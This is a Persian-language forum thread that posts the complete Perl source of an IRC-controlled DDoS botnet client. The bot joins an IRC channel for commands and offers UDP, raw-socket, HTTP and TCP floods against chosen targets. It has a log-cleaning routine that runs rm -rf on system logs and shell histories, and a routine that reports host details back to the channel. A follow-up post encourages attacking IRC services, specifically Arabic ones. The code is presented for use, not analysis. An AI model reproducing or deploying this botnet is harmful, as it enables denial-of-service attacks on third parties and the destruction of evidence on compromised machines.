• ¡Welcome to Square Theme!
  • This news are in header template.
  • Please ignore this message.
مهمان عزیز خوش‌آمدید. ورود عضــویت


امتیاز موضوع:
  • 1 رای - 5 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
Title: [PERL t0fx DDOS bot
حالت موضوعی
#1
کد:
#!/usr/bin/perl -w
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
use LWP::Simple;
use URI::Escape;

print q{
-------------------------------
                _____      
  _____   _____/ ____\____  
/     \ /  _ \   __\/  _ \
|  Y Y  (  <_> )  | (  <_> )
|__|_|  /\____/|__|  \____/
      \/                    
-------------------------------
\\ m0f0 ddos priv8 by t0fx  //
\\ credits to pitbull bot //
  \\  europasecurity.org  //
   \\  spam.ws //
    \\------------------//

};
#= CONFIGURATION =========================================#
my $server = "romania.indoirc.net";                       #
my $nick  = "[m0f0][" . int( rand(9999) ) . "]";          #
my $port = "6667";                                        #
my $channel = "#wreck";                                   #
#= END OF CONFIGURATION ==================================#

my $name     = "mofo 8 *  : mofo";  
print "\n";
print "\n [+] Connecting to $server\n";
$connection = IO::Socket::INET->new(PeerAddr=>"$server",
                                    PeerPort=>"$port",
                                    Proto=>'tcp',
                                    Timeout=>'30') or die " [-] Couldnt connect to $server\n";
print " [+] Connected to $server\n\n";                    
print $connection "USER $name\n";
print $connection "NICK $nick\r\n";

while($response = <$connection>)

{

     print $response;  #print IRC Response
     if($response =~ m/:(.*) 00(.*) (.*) :/){print $connection "JOIN ".$channel."\r\n";}
     if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!help/){&help;}    
     if($response =~ m/^PING (.*?)$/gi){print $connection "PONG ".$1."\r\n";}  
     if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!die/){&diebastard;}
     if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!logcleaner/){&logcleaner;}
     if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!infos/){&infos;}
     if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
print $connection "PRIVMSG $channel :6|6.:12UDP DDos6:.6|12 Attacking 6 ".$3." 12 with 6 ".$4." 12  packets during 6 ".$5." 12 seconds.\r\n";
my ($dtime, %packets) =  udpflooder("$3", "$4", "$5");
$dtime = 1 if $dtime == 0;
my %bytes;  
$bytes{igmp} = $4 * $packets{igmp};
$bytes{icmp} = $4 * $packets{icmp};  
$bytes{o} = $4 * $packets{o};
$bytes{udp} = $4 * $packets{udp};  
$bytes{tcp} = $4 * $packets{tcp};
print $connection "PRIVMSG $channel :6|6.:12UDP DDos6:.6|12 Results6  ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12KB in6  ".$dtime." 12seconds 6 ".$3.".\r\n";
}

     if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!httpflood\s+(.*)\s+(\d+)/) {  
print $connection "PRIVMSG $channel :6|6.:6HTTP DDos6:.6|12  Attacking 6 ".$3." 12 on port 80 during6 ".$4." 12 seconds .\r\n";
my $itime  = time;
my ($cur_time);
$cur_time = time - $itime;
while  ($4>$cur_time){
$cur_time = time - $itime;
my $socket =  IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$3, PeerPort=>80);
print $socket "GET / HTTP/1.0\r\nAccept: */*\r\nHost: ".$3." \r\nConnection:  Keep-Alive\r\n\r\n";
close($socket);
}
print $connection "PRIVMSG $channel :6|6.:6HTTP DDos6:.6|12 Attack finished 6 ".$3.".\r\n";  
}

     if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
print $connection "PRIVMSG $channel :6|6.:11TCP DDos6:.6|12 Attacking 6 ".$3.":".$4." 12during 6 ".$5."  12seconds.\r\n";
  my $itime = time;
  my ($cur_time);
  $cur_time =  time - $itime;
  while ($5>$cur_time){
  $cur_time = time - $itime;  
  &tcpflooder("$3","$4","$5");
}  
print $connection "PRIVMSG $channel :6|6.:11TCP DDos6:.6|  12Attack finished 6 ".$3.":".$4.".\r\n";
}

}

################################################################################​############
sub diebastard
{
     print $connection "PRIVMSG $channel :8,1 Quitting... \r\n";
            exec("pkill perl https.pl \n");  
}
################################################################################​############
sub help
{
     my $asker = $1;
print $connection "PRIVMSG $channel :6$asker 11[!] Help :\r\n";
print $connection "PRIVMSG $channel :6|6.:12HTTP DDos6:.6| 11!httpflood <IP> <duration>\r\n";  
print $connection "PRIVMSG $channel :6|6.:12UDP DDos6:.6| 11!udpflood <IP> <Packet size> <duration>\r\n";  
print $connection "PRIVMSG $channel :6|6.:12TCP DDos6:.6| 11!tcpflood <IP> <Port> <duration>\r\n";  
print $connection "PRIVMSG $channel :6|6.:12Log Cleaner6:.6| 11!logcleaner\r\n";
print $connection "PRIVMSG $channel :6|6.:12Infos6:.6| 11!infos\r\n";

}
################################################################################​############
sub logcleaner
{
     my $asker = $1;
         print $connection "PRIVMSG $channel :6$asker 11[!] Cleaning started\r\n";
        system 'rm -rf  /var/log/lastlog';
        system 'rm -rf /var/log/wtmp';
        system 'rm -rf  /etc/wtmp';
        system 'rm -rf /var/run/utmp';
        system 'rm -rf  /etc/utmp';
        system 'rm -rf /var/log';
        system 'rm -rf /var/logs';  
        system 'rm -rf /var/adm';
        system 'rm -rf /var/apache/log';
        system 'rm -rf /var/apache/logs';
        system 'rm -rf /usr/local/apache/log';  
        system 'rm -rf /usr/local/apache/logs';
        system 'rm -rf  /root/.bash_history';
        system 'rm -rf /root/.ksh_history';  
         print $connection "PRIVMSG $channel :6$asker 11[!] File Log bash_history Cleaned\r\n";
        sleep 1;  
         print $connection "PRIVMSG $channel :6$asker 11[!] Cleaning files\r\n";
        system 'find  / -name *.bash_history -exec rm -rf {} \;';
        system 'find / -name  *.bash_logout -exec rm -rf {} \;';
        system 'find / -name "log*" -exec rm  -rf {} \;';
        system 'find / -name *.log -exec rm -rf {} \;';
        sleep 1;
         print $connection "PRIVMSG $channel :6$asker 11[!] Cleaning Successfull\r\n";
      
}

################################################################################​############
sub  udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my  $ftime = $_[2];
my $cp = 0;
my (%packets);
$packets{icmp} =  $packets{igmp} = $packets{udp} = $packets{o} = $packets{tcp} = 0;  
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET,  SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;  
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;  
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $fport =  1;
$fport <= 65000; $fport++) {
$cur_time = time - $itime;
last  if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($fport, $iaddr))  and $packets{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($fport, $iaddr)) and  $packets{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($fport, $iaddr)) and  $packets{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($fport, $iaddr)) and  $packets{tcp}++;


for (my $pc = 3;
$pc <= 255;$pc++) {  
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >=  $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg,  0, sockaddr_in($fport, $iaddr)) and $packets{o}++;
}
}
last if  $cur_time >= $ftime;
}
return($cur_time, %packets);
}
################################################################################​############
sub tcpflooder {
my $itime = time;  
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);  
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];  
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;  
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time  >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);  
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while  ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;  
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
################################################################################​############

################################################################################​############
sub infos
{      
my $uname=`uname  -a`;
my $uptime=`uptime`;
my $ownd=`pwd`;
my $distro=`cat /etc/issue`;
my $id=`id`;
my $un=`uname  -sro`;
my $asker = $1;
print $connection "PRIVMSG $channel :6$asker 5[!] System infos :\r\n";
print $connection "PRIVMSG $channel :6|6.:12Bot Info6:.6| 12Bot version     : 11 m0f0 v1 by t0fx\r\n";
print $connection "PRIVMSG $channel :6|6.:12System Info6:.6| 12Uname -a     : 11 $uname\r\n";  
print $connection "PRIVMSG $channel :6|6.:12System Info6:.6| 12Uptime       : 11  $uptime\r\n";  
print $connection "PRIVMSG $channel :6|6.:12System Info6:.6| 12ID           : 11 $id\r\n";  
print $connection "PRIVMSG $channel :6|6.:12System Info6:.6| 12Directory      : 11  $ownd\r\n"; ;
print $connection "PRIVMSG $channel :6|6.:12System Info6:.6| 12OS           : 11 $distro\r\n";  

}
################################################################################​############
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
#2
به سورس بالا میتونید به سرویس های irc حمله کنید.
پکت های زیادی برای کاربراها و در داخل خودم روم میره
بد نیست رو سرویس های ای ار سی عربی تست کنید :-)
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
  


موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  سورس کد ddos به زبان دلفی Amin_Mansouri 0 5,022 09-09-2012، 01:17 PM
آخرین ارسال: Amin_Mansouri

پرش به انجمن:


Browsing: